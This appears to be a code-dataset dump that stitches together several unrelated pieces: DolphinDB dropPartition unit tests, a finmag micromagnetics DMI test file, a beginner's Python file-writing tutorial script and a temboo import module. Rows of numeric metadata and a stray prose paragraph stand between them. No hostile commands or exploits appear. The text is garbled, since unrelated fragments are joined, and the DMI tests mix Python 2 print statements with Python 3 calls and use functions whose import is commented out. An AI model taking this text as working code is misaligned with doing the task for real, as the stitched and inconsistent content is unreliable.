assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level3_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level3_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
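The tests above repeat one pattern at every partition level: rebuild the database, compute the rows expected to survive with a `where` filter, drop the partitions, and compare. A minimal sketch of that pattern, reusing the helpers this file already assumes (`create_dfs_compo_range_value_list_db`, `loadTB`, `DBInfo`) and a connected session `s`; the helper name `check_drop` is made up for illustration.

from pandas.testing import assert_frame_equal

def check_drop(s, dbPath, tbName, partitions, where_remaining):
    # Rebuild a fresh composite RANGE/VALUE/LIST database, then verify that
    # dropping `partitions` from `tbName` leaves exactly the complement rows.
    create_dfs_compo_range_value_list_db()
    expected = loadTB(dbPath, tbName, where_remaining)
    s.dropPartition(dbPath, partitions, tbName)
    assert_frame_equal(loadTB(dbPath, tbName), expected)

# e.g. the first case above, dropping two level-1 (date) partitions:
# check_drop(s, DBInfo.dfsDBName, DBInfo.table1,
#            ["2010.01.01", "2010.02.01"], "where date>=2010.03.01")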
| 46.777583
| 156
| 0.648921
| 9,979
| 80,130
| 5.007816
| 0.014531
| 0.181778
| 0.161687
| 0.22188
| 0.991655
| 0.991655
| 0.990395
| 0.988214
| 0.986613
| 0.985852
| 0
| 0.065299
| 0.224635
| 80,130
| 1,712
| 157
| 46.804907
| 0.739031
| 0.029315
| 0
| 0.910072
| 0
| 0.027338
| 0.159756
| 0.066209
| 0
| 0
| 0
| 0
| 0.363309
| 1
| 0.039568
| false
| 0
| 0.002878
| 0
| 0.048201
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98dbcf8a711b446f0a43afe841c43ac8e5cb8a72
| 6,324
|
py
|
Python
|
src/finmag/tests/test_dmi_terms.py
|
davidcortesortuno/finmag
|
9ac0268d2c0e45faf1284cee52a73525aa589e2b
|
[
"BSL-1.0"
] | 10
|
2018-03-24T07:43:17.000Z
|
2022-03-26T10:42:27.000Z
|
src/finmag/tests/test_dmi_terms.py
|
davidcortesortuno/finmag
|
9ac0268d2c0e45faf1284cee52a73525aa589e2b
|
[
"BSL-1.0"
] | 21
|
2018-03-26T15:08:53.000Z
|
2021-07-10T16:11:14.000Z
|
src/finmag/tests/test_dmi_terms.py
|
davidcortesortuno/finmag
|
9ac0268d2c0e45faf1284cee52a73525aa589e2b
|
[
"BSL-1.0"
] | 7
|
2018-04-09T11:50:48.000Z
|
2021-06-10T09:23:25.000Z
|
import pytest
import dolfin as df
mesh = df.BoxMesh(df.Point(0, 0, 0), df.Point(1, 1, 1), 10, 10, 10)
V1 = df.VectorFunctionSpace(mesh, "CG", 1)
VT = df.TensorFunctionSpace(mesh, "CG", 1)
Vs = df.FunctionSpace(mesh, "CG", 1)
tf = df.TestFunction(Vs)
#from finmag.energies.dmi import dmi_term3d, dmi_term2d, dmi_term3d_dolfin
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def compare_dmi_term3d_with_dolfin(Mexp):
"""Expects string to feed into df.Expression for M"""
print "Working on Mexp=", Mexp
Mexp = df.Expression(Mexp, degree=1)
M = df.interpolate(Mexp, V1)
E = dmi_term3d(M, tf, 1)[0] * df.dx
E1 = df.assemble(E)
E_dolfin = dmi_term3d_dolfin(M, tf, 1)[0] * df.dx
dolfin_curl = df.project(df.curl(M), V1)
curlx, curly, curlz = dolfin_curl.split()
print "dolfin-curlx=", df.assemble(curlx * df.dx)
print "dolfin-curly=", df.assemble(curly * df.dx)
print "dolfin-curlz=", df.assemble(curlz * df.dx)
E2 = df.assemble(E_dolfin)
    print(E1, E2)
    print("Diff is %.18e" % (E1 - E2))
return abs(E1 - E2)
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def compare_dmi_term2d_with_dolfin(Mexp):
"""Expects string to feed into df.Expression for M"""
print "Working on Mexp=", Mexp
Mexp = df.Expression(Mexp, degree=1)
V2d = df.VectorFunctionSpace(mesh, "CG", 1)
M2d = df.interpolate(Mexp, V2d)
M = df.interpolate(Mexp, V1)
E = dmi_term2d(M2d, tf, 1)[0] * df.dx
E1 = df.assemble(E)
E_dolfin = dmi_term3d_dolfin(M, tf, 1)[0] * df.dx
dolfin_curl = df.project(df.curl(M), V1)
curlx, curly, curlz = dolfin_curl.split()
print "dolfin-curlx=", df.assemble(curlx * df.dx)
print "dolfin-curly=", df.assemble(curly * df.dx)
print "dolfin-curlz=", df.assemble(curlz * df.dx)
E2 = df.assemble(E_dolfin)
    print(E1, E2)
    print("Diff is %.18e" % (E1 - E2))
return abs(E1 - E2)
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def test_dmi_term2d():
mesh = df.BoxMesh(df.Point(0, 0, 0), df.Point(1, 1, 1), 10, 10, 10)
mesh2d = df.RectangleMesh(df.Point(0, 0), df.Point(1, 1), 10, 10)
eps = 1e-15
assert compare_dmi_term2d_with_dolfin(("x[0]", "0.", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("x[1]", "0.", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("x[2]", "0.", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("0", "x[0]", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("0", "x[1]", "0.")) < eps
assert compare_dmi_term2d_with_dolfin(("0", "x[2]", "0.")) < eps
#assert compare_dmi_term2d_with_dolfin(("0.","0","x[0]")) <eps
#assert compare_dmi_term2d_with_dolfin(("0.","0","x[1]")) <eps
#assert compare_dmi_term2d_with_dolfin(("0.","0","x[2]")) <eps
# and some more complicated expressions
assert compare_dmi_term2d_with_dolfin(("-0.5*x[1]", "0.5*x[0]", "1")) < eps
assert compare_dmi_term2d_with_dolfin(("-0.5*x[1]*x[1]",
"2*0.5*x[0]",
"0")) < eps
assert compare_dmi_term2d_with_dolfin(("-0.5*x[1]*x[0]",
"2*0.5*x[0]-x[1]",
"0")) < eps
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def test_dmi_with_analytical_solution():
"""For a vector field a(x,y,z)=0.5 * (-y, x, c),
the curl is exactly 1.0."""
eps = 1e-13
M = df.interpolate(df.Expression(("-0.5*x[1]", "0.5*x[0]", "1"), degree=1), V1)
c = 1.0
E1 = df.assemble(dmi_term3d(M, tf, c)[0] * df.dx)
Eexp = 1.0
print "Expect E=%e, computed E=%e" % (Eexp, E1)
diff = abs(E1 - Eexp)
print "deviation between analytical result and numerical is %e" % diff
assert diff < eps
"""For a vector field a(x,y,z)=0.5 * (-y, x, c),
the curl is exactly 1.0."""
eps = 1e-12
M = df.interpolate(df.Expression(("-0.5*x[1]*2", "0.5*x[0]*2", "1"), degree=1), V1)
c = 3.0
E1 = df.assemble(dmi_term3d(M, tf, c)[0] * df.dx)
Eexp = 6.0
print "Expect E=%e, computed E=%e" % (Eexp, E1)
diff = abs(E1 - Eexp)
print "deviation between analytical result and numerical is %e" % diff
assert diff < eps
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def test_dmi_term3d():
eps = 1e-15
assert compare_dmi_term3d_with_dolfin(("x[0]", "0.", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("x[1]", "0.", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("x[2]", "0.", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("0", "x[0]", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("0", "x[1]", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("0", "x[2]", "0.")) < eps
assert compare_dmi_term3d_with_dolfin(("0.", "0", "x[0]")) < eps
assert compare_dmi_term3d_with_dolfin(("0.", "0", "x[1]")) < eps
assert compare_dmi_term3d_with_dolfin(("0.", "0", "x[2]")) < eps
# and some more complicated expressions
assert compare_dmi_term3d_with_dolfin(("-0.5*x[1]", "0.5*x[0]", "1")) < eps
assert compare_dmi_term3d_with_dolfin(("-0.5*x[1]*x[1]",
"2*0.5*x[0]",
"x[0]+x[1]+x[2]")) < eps
assert compare_dmi_term3d_with_dolfin(("-0.5*x[1]*x[0]",
"2*0.5*x[0]-x[2]",
"x[0]+x[1]+x[2]")) < eps
@pytest.mark.skip(reason='Not sure if we even use dmi_term3d anymore')
def test_can_post_process_form():
M = df.interpolate(df.Expression(("-0.5*x[1]", "0.5*x[0]", "1"), degree=1), V1)
c = 1.0
E = dmi_term3d(M, tf, c)[0] * df.dx
v = df.TestFunction(V1)
dE_dM = df.derivative(E, M, v)
#vol = df.assemble(df.dot(v, df.Constant([1,1,1]))*df.dx).array()
tmp = df.assemble(dE_dM)
g_form = df.derivative(dE_dM, M)
g_petsc = df.PETScMatrix()
df.assemble(g_form, tensor=g_petsc)
#H_dmi_petsc = df.PETScVector()
# if we got to this line, the required assembly to compute fields works.
assert True
if __name__ == "__main__":
# test_dmi_term3d()
# test_dmi_term2d()
# test_can_post_process_form()
test_dmi_with_analytical_solution()
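As a standalone sanity check on the analytical values used above (independent of finmag and dolfin), the curls can be verified symbolically. This short sketch assumes sympy is available; it is not part of the original test module.

from sympy.vector import CoordSys3D, curl

N = CoordSys3D('N')

# M = 0.5*(-y, x, 2) has curl (0, 0, 1): with c=1 the assembled energy
# over the unit cube is 1.0, matching the first assertion above.
M1 = -0.5 * N.y * N.i + 0.5 * N.x * N.j + 1 * N.k
print(curl(M1))   # -> N.k, i.e. (0, 0, 1)

# Doubling the in-plane components doubles the curl to (0, 0, 2); with
# c=3 the expected energy is 2 * 3 = 6.0, matching the second assertion.
M2 = -1.0 * N.y * N.i + 1.0 * N.x * N.j + 1 * N.k
print(curl(M2))   # -> 2*N.k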
| 41.064935
| 87
| 0.595667
| 1,036
| 6,324
| 3.470077
| 0.132239
| 0.072601
| 0.106815
| 0.105702
| 0.850904
| 0.801113
| 0.79388
| 0.763561
| 0.758554
| 0.750209
| 0
| 0.062016
| 0.224858
| 6,324
| 153
| 88
| 41.333333
| 0.671359
| 0.088868
| 0
| 0.508772
| 0
| 0
| 0.165451
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0
| null | null | 0
| 0.017544
| null | null | 0.140351
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98de73ed3d146783cd62a9397271d22e1aa78934
| 5,569
|
py
|
Python
|
Writinginafile1.py
|
shyed2001/Python_Programming
|
93ef958e3d8aa77f9191b550972235ce4fe4a6cb
|
[
"bzip2-1.0.6"
] | 2
|
2019-05-01T04:32:14.000Z
|
2019-05-04T11:28:18.000Z
|
Writinginafile1.py
|
shyed2001/python-learning-basics
|
93ef958e3d8aa77f9191b550972235ce4fe4a6cb
|
[
"bzip2-1.0.6"
] | null | null | null |
Writinginafile1.py
|
shyed2001/python-learning-basics
|
93ef958e3d8aa77f9191b550972235ce4fe4a6cb
|
[
"bzip2-1.0.6"
] | null | null | null |
#-------------------------------------------------------------------------------
# Name: Writinginafile1
# Purpose: Learn to Writing in a file
#
# Author: Shyed Shahriar Housaini
#
# Created: 17/09/2019
# Copyright: (c) Shyed Shahriar Housaini 2019
# Licence: Terms from Shyed Shahriar Housaini
#-------------------------------------------------------------------------------
print(""" we can not write in a file which is open in a r read mode """)
print(""" if the file we are trying to write to by w , if that file does
not exist, that will be created, or if it does exist, with the same name,
that file will be overwritten nad may get corrupted """)
with open("G:/PyWorkDirectory/2PAGLA2.txt", "w") as fl11:
pass
print(""" with open("G:/PyWorkDirectory/2PAGLA2.txt", "w") as fl11:
pass
that code block will only create the file """)
print(""" with open("G:/PyWorkDirectory/2PAGLA2.txt", "w") as fl11:
fl11.write("rrrr")
that code block will create the file and write rrrr to it""")
with open("G:/PyWorkDirectory/2PAGLA2.txt", "w") as fl11:
fl11.write("rr/nrrrr")
fl11.write("RR\nRRRR")
print(""""
fl1.seek(o) start to write the file from begineening again""")
fl11.seek(0)
fl11.write("WWrite")
fl11.write("\nwww\nWWW/nwww/nWWWrite after seek /0")
print(""" with open("G:/PyWorkDirectory/2PAGLA2.txt", "a") as fl11:
fl11.write("rrrr")
that code block will create the file and write rrrr to it; 'a' instead of 'w' is
used to append, i.e. write at the end of the existing data""")
with open("G:/PyWorkDirectory/2PAGLA2.txt", "a") as fl11:
fl11.write("rr/nrrrr")
fl11.write("RR\nRRRR/nrRrRrRrRappend")
print(""" to read and copy a file and write/create that copy file line by line
we use -
with open("G:/PyWorkDirectory/2PAGLA2.txt", "r") as rf:
with open("G:/PyWorkDirectory/2PAGLA2rfwfcopy.txt", "w") as wf:
for line in rf:
wf.write(line)
""")
with open("G:/PyWorkDirectory/2PAGLA2.txt", "r") as rf:
with open("G:/PyWorkDirectory/2PAGLA2rfwfcopy.txt", "w") as wf:
for line in rf:
wf.write(line)
print(""" To copy and write/create an image file the code will be
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/copyOF640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
for line in rbf:
wbf.write(line)
'rb' and 'wb' are used instead of 'r' and 'w'
""")
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/copyOF640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
for line in rbf:
wbf.write(line)
print(""" reading the picture png file in binary mode chunk by chunk and
copy and create that file-
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/ChunksizecopyOF640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 2560
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 2500:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
as the loop stops once a chunk is shorter than the threshold, not all of the
binary bytes are written and part of the picture will be missing.
""")
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/ChunkSizecopyOF640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 2560
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 2000:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
print(""" reading the picture png file in binary mode chunk by chunk and
copy and create that file-
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/chunksiz640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 4000
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 2500:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
as the loop stops once a chunk is shorter than the threshold, not all of the
binary bytes are written and part of the picture will be missing.
""")
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/chunksiz640px-Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 4000
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 2500:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
with open("G:/PyWorkDirectory/640px-Computer_system_bus.svg.png", "rb") as rbf:
with open("G:/PyWorkDirectory/Computer_system_buscopyOF.svg.png", "wb") as wbf:
chunk_size= 4000
rbf_chunk=rbf.read(chunk_size)
while len(rbf_chunk)> 0:
wbf.write(rbf_chunk)
wbf.tell()
rbf_chunk=rbf.read(chunk_size)
print("""The write method returns the number of bytes written to a file,
if successful.""")
msg = "Hello world!"
file222 = open("G:/PyWorkDirectory/newfile22.txt", "w")
amount_written = file222.write(msg)
print(amount_written)
file222.close()
print(""" To write something other than a string, it needs to be
converted to a string first.
If a file write operation is successful,
file.write(msg) == len(msg)
statements will be true.
""")
| 39.778571
| 105
| 0.641049
| 799
| 5,569
| 4.386733
| 0.190238
| 0.035663
| 0.142653
| 0.164337
| 0.705563
| 0.705563
| 0.705563
| 0.704137
| 0.704137
| 0.704137
| 0
| 0.034924
| 0.213324
| 5,569
| 139
| 106
| 40.064748
| 0.765122
| 0.068594
| 0
| 0.660714
| 0
| 0.053571
| 0.702263
| 0.283049
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.017857
| 0
| 0
| 0
| 0.116071
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c70ad684727ab26b8ed2577de9861f92e7df2c4c
| 606
|
py
|
Python
|
temboo/core/Library/SunlightLabs/CapitolWords/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/SunlightLabs/CapitolWords/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/SunlightLabs/CapitolWords/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.SunlightLabs.CapitolWords.Dates import Dates, DatesInputSet, DatesResultSet, DatesChoreographyExecution
from temboo.Library.SunlightLabs.CapitolWords.FullTextSearch import FullTextSearch, FullTextSearchInputSet, FullTextSearchResultSet, FullTextSearchChoreographyExecution
from temboo.Library.SunlightLabs.CapitolWords.Phrases import Phrases, PhrasesInputSet, PhrasesResultSet, PhrasesChoreographyExecution
from temboo.Library.SunlightLabs.CapitolWords.TopPhraseSources import TopPhraseSources, TopPhraseSourcesInputSet, TopPhraseSourcesResultSet, TopPhraseSourcesChoreographyExecution
| 121.2
| 178
| 0.907591
| 44
| 606
| 12.5
